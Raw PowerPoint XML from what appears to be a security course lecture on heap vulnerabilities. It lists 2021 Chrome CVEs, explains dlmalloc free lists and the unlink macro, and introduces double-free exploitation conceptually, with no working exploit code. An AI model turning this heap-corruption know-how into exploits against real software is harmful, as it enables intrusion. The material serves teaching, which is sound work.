      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30542931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C9EA47-FF17-834A-9281-911CC5EAD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8" y="1764207"/>
            <a:ext cx="7313348" cy="44511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BB6C6A-32CC-DB4C-9F1E-E895EDAC8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Vulnerabilities (2015-2020)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29112981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5FD022AD-180A-214C-9086-C2D7CAC0B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27" y="930080"/>
            <a:ext cx="6730111" cy="204171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F37B06-490E-664B-A913-4B254384901A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1240875" y="589095"/>
            <a:ext cx="314280" cy="349200"/>
            <a:chOff x="1240875" y="589095"/>
            <a:chExt cx="31428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78AFE5F-BC8C-064C-94A8-B6DCD2A45342}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1240875" y="589095"/>
                <a:ext cx="236520" cy="342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78AFE5F-BC8C-064C-94A8-B6DCD2A453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05235" y="553095"/>
                  <a:ext cx="3081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02E1077-0C55-5946-85A0-46E5065A158A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1322595" y="818775"/>
                <a:ext cx="232560" cy="119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02E1077-0C55-5946-85A0-46E5065A158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6595" y="782775"/>
                  <a:ext cx="304200" cy="191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CD0493C-C9AA-A54C-9E80-3B033ABA6A0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="884101" y="3373375"/>
            <a:ext cx="1042379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High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId8" tooltip="https://crbug.com/1252878"/>
              </a:rPr>
              <a:t>CVE-2021-37977</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> : Use after free in Garbage Collection. Reported by Anonymous on 2021-09-24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId9" tooltip="https://crbug.com/1236318"/>
              </a:rPr>
              <a:t>CVE-2021-37978</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> : Heap buffer overflow in Blink. Reported by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Yangkang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dnpushme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) of 360 ATA on 2021-08-04</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId10" tooltip="https://crbug.com/1247260"/>
              </a:rPr>
              <a:t>CVE-2021-37979</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> : Heap buffer overflow in WebRTC. Reported by Marcin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Towalski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of Cisco Talos on 2021-09-07</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId11" tooltip="https://crbug.com/1254631"/>
              </a:rPr>
              <a:t>CVE-2021-37980</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> : Inappropriate implementation in Sandbox. Reported by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Yonghwi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Jin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (@jinmo123) on 2021-09-30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A3134C-D98E-FA42-BC74-3950DF34D154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2000250" y="6048093"/>
            <a:ext cx="9715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www.forbes.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/sites/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>gordonkelly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/2021/10/09/google-chrome-hack-new-attack-upgrade-chrome-now/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0C837B9-CA92-FE42-A78F-CF92B2990926}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3703995" y="3811095"/>
              <a:ext cx="1387080" cy="36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0C837B9-CA92-FE42-A78F-CF92B299092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67995" y="3775455"/>
                <a:ext cx="14587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F0FAF61-99EF-BF44-B47D-2E6919D8E6EB}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3689595" y="4398615"/>
              <a:ext cx="2095200" cy="61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F0FAF61-99EF-BF44-B47D-2E6919D8E6E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53595" y="4362615"/>
                <a:ext cx="216684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2CF6403-6A3A-D049-92CB-AAD5BBA19329}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3733875" y="4981455"/>
              <a:ext cx="2079360" cy="59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2CF6403-6A3A-D049-92CB-AAD5BBA1932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98235" y="4945455"/>
                <a:ext cx="2151000" cy="1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272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EDFCF-8D56-C34B-B15F-2A691BC1E789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059043" y="6110869"/>
            <a:ext cx="7730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security.googleblog.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/2021/09/an-update-on-memory-safety-in-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>chrome.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0"/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093C8AEF-EE76-4244-9F68-CC298DA3A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87" y="706244"/>
            <a:ext cx="3975100" cy="7620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E025459-C139-1C47-BE6A-57EE69E12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87" y="1691733"/>
            <a:ext cx="4559300" cy="952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4A4C89-FCEB-FB45-886B-D4020CD74160}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728083" y="3116632"/>
            <a:ext cx="103161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year, we showed that more than 70% of our severe security bugs are memory safety problems.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Chrome has been exploring three broad avenues to seize this opportunity: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C++ safer through compile-time checks that pointers are correct.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C++ safer through runtime checks that pointers are correct.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Investigating use of a memory safe language for parts of our codebase.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In each case, we hope to eliminate a sizable fraction of our exploitable security bugs, but we also expect some performance penalty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574D7B4-6962-BE4F-818E-9E926D1729F5}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1462995" y="5731695"/>
              <a:ext cx="1848600" cy="62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574D7B4-6962-BE4F-818E-9E926D1729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27355" y="5696055"/>
                <a:ext cx="192024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F60B111-19E0-6345-82BF-A17D2A7489D8}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4395195" y="3560535"/>
              <a:ext cx="5868360" cy="76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F60B111-19E0-6345-82BF-A17D2A7489D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59195" y="3524535"/>
                <a:ext cx="5940000" cy="14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08260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49B1F7EF-3198-674F-9E76-29D42D1572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Doug Lea’s Memory Allocator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71CD6E2B-9946-FF4C-BA26-90F5D642E6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dirty="0"/>
              <a:t>The GNU C library and most versions of Linux are based on Doug Lea’s malloc (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dlmalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>) as the default native version of malloc </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61444" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C30C9C34-9B01-DB40-8AF6-2C5A18BDE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367088"/>
            <a:ext cx="8229600" cy="295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FCA8F1-518D-304D-AE5A-ED4182477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038600"/>
            <a:ext cx="4191000" cy="8382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FB8902-4DAA-B440-9E39-D4F2E74BA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038600"/>
            <a:ext cx="4191000" cy="8382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7027D221-96F6-AF49-9ED3-19EB2AE75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267200"/>
            <a:ext cx="762000" cy="304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026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1789731C-36D7-CC4D-8516-3622769ED8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Free Chunks in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dlmalloc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63491" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DFB132D-2618-3B48-8D38-FB100C438E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3964" y="1759293"/>
            <a:ext cx="5319713" cy="4456113"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63493" name="Oval 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE58A78-A92D-4446-840C-C222B1478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4963" y="2597492"/>
            <a:ext cx="914400" cy="609600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3A35606-753F-614A-BBA8-EC643D573974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6924677" y="1759293"/>
            <a:ext cx="4357688" cy="43151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/>
              <a:t>Organized into circular double-linked lists (bins)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Each chunk on a free list contains forward and back pointers to the next and previous chunks in the list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>These pointers in a free chunk occupy the same eight bytes of memory as user data in an allocated chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Chunk size is stored in the last four bytes of the free chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>Enables adjacent free chunks to be consolidated to avoid fragmentation of memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22441519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34A48EE2-5590-B644-BD01-B925754966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Responding to Malloc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CF9D19FA-B6A4-0D41-AA92-CA90FDECED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Autofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Best-fit method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>An area with m bytes is selected, where m is the smallest available chunk of contiguous memory equal to or larger than n (requested allocation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>First-fit method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Returns the first chunk encountered containing n or more bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Prevention of fragmentation </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Memory manager may allocate chunks that are larger than the requested size if the space remaining is too small to be useful</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30886595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BD3FBBCD-1845-B348-BD06-210C5C9F3D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Unlink Macro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D40E85F5-FC57-324C-B0F6-9C9138D2EE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en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>#define unlink(P, BK, FD) {	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en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   FD = P-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;	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en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   BK = P-&gt;bk;	 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en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   FD-&gt;bk = BK;	 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en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>   BK-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = FD; 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en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65541" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DA7087F-06D1-3B4E-8E43-ADFC3006E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5721763"/>
            <a:ext cx="55002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Removes a chunk from a free list  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-when?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152D3-A7EA-4540-B219-C49B7B06A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5486" y="3720223"/>
            <a:ext cx="5500217" cy="10156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Hmm… memory copy…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Address of destination read from the free chunk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The value to write also read from the free chunk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C4C50-32C8-5240-8BC9-0B3FD0BCA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014" y="1223969"/>
            <a:ext cx="3629520" cy="132343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+mn-lt"/>
              </a:rPr>
              <a:t>What if the allocator is confused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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+mn-lt"/>
              </a:rPr>
              <a:t>and this chunk has actually </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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+mn-lt"/>
              </a:rPr>
              <a:t>been allocated…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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+mn-lt"/>
              </a:rPr>
              <a:t>… and user data written into it?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7DEA43-2F02-3D45-98CA-C516B460F05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702800" y="2732094"/>
            <a:ext cx="0" cy="1311275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8792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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F63A7F8-903A-1749-99DF-D26030B40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759293"/>
            <a:ext cx="5657850" cy="44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Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05A082A5-1061-6F40-9557-4EB03BDBF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Unlink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3542F4-3C59-D04C-8994-C9695FC2D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3740492"/>
            <a:ext cx="2743200" cy="685800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F7BD81-A67C-DB42-A1E0-A47DBD42643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057900" y="3054692"/>
            <a:ext cx="1371600" cy="685800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396969F-9107-5040-BDE7-659E9D1058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8963" y="2216492"/>
            <a:ext cx="2427268" cy="707886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+mn-lt"/>
              </a:rPr>
              <a:t>What if this area</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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+mn-lt"/>
              </a:rPr>
              <a:t>contained </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>user data?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163788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build="allAtOnce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Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50EDC238-0398-3B43-BFB9-FE1247DA7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Double-Free Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody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B8D82CA5-E00D-554D-AF15-572E6BE574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9891713" cy="384962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Freeing the same chunk of memory twice, without it being reallocated in between</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Start with a simple case:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>The chunk to be freed is isolated in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>The bin (double-linked list) into which the chunk will be placed is empty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US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21086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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9B78D34-CF6F-CD42-91BC-FD7F0E6E06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 Exploits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243BE0B8-3B8C-7C40-A55E-8DDDFE1A67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5524500" cy="3849624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Buffer is a data storage area inside computer memory (stack or heap)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Intended to hold pre-defined amount of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Simplest exploit: supply executable code as “data”, trick victim’s machine into executing it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Code will self-propagate or give attacker control over machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A child standing in front of a chalkboard&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD4270D9-4447-A44A-BA19-3C55FAF03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000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6908800" y="1835150"/>
            <a:ext cx="4006850" cy="39287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55BEC9-AA7D-4145-BA70-171BE54E4789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6292850" y="765632"/>
            <a:ext cx="5238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US" altLang="en-US" dirty="0"/>
              <a:t>Pointer assignment, format strings, memory allocation and de-allocation, function pointers, calls to library functions via offset tables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C0411-10F4-784C-9C1D-65051F7C8ED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4739452" y="5261299"/>
            <a:ext cx="5378909" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="381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en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In general, attack need not involve code injection or data execution!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99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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1502E0C-6A99-3C4B-AAE0-3140DBBE57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949450"/>
            <a:ext cx="8229600" cy="3949700"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68612" name="Title 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1083EC3-A51A-4546-AE54-113AFF15D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Empty Bin and Allocated Chunk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39665009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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD53E822-669C-D040-B1F0-DF4E0B6DEE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2074863"/>
            <a:ext cx="8229600" cy="3700462"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59893F0B-7D37-0C4D-B1C4-7894117C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After First Call to free()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24131980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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF152460-8801-C44E-8011-34141F7836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2074863"/>
            <a:ext cx="8229600" cy="3700462"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86F3FF0D-EF9E-694B-BE19-6582BC3D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After Second Call to free()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16704378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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{887852AE-4448-7444-8968-2653199F0C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2074863"/>
            <a:ext cx="8229600" cy="3700462"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71683" name="Title 3">
            <a:extLst>
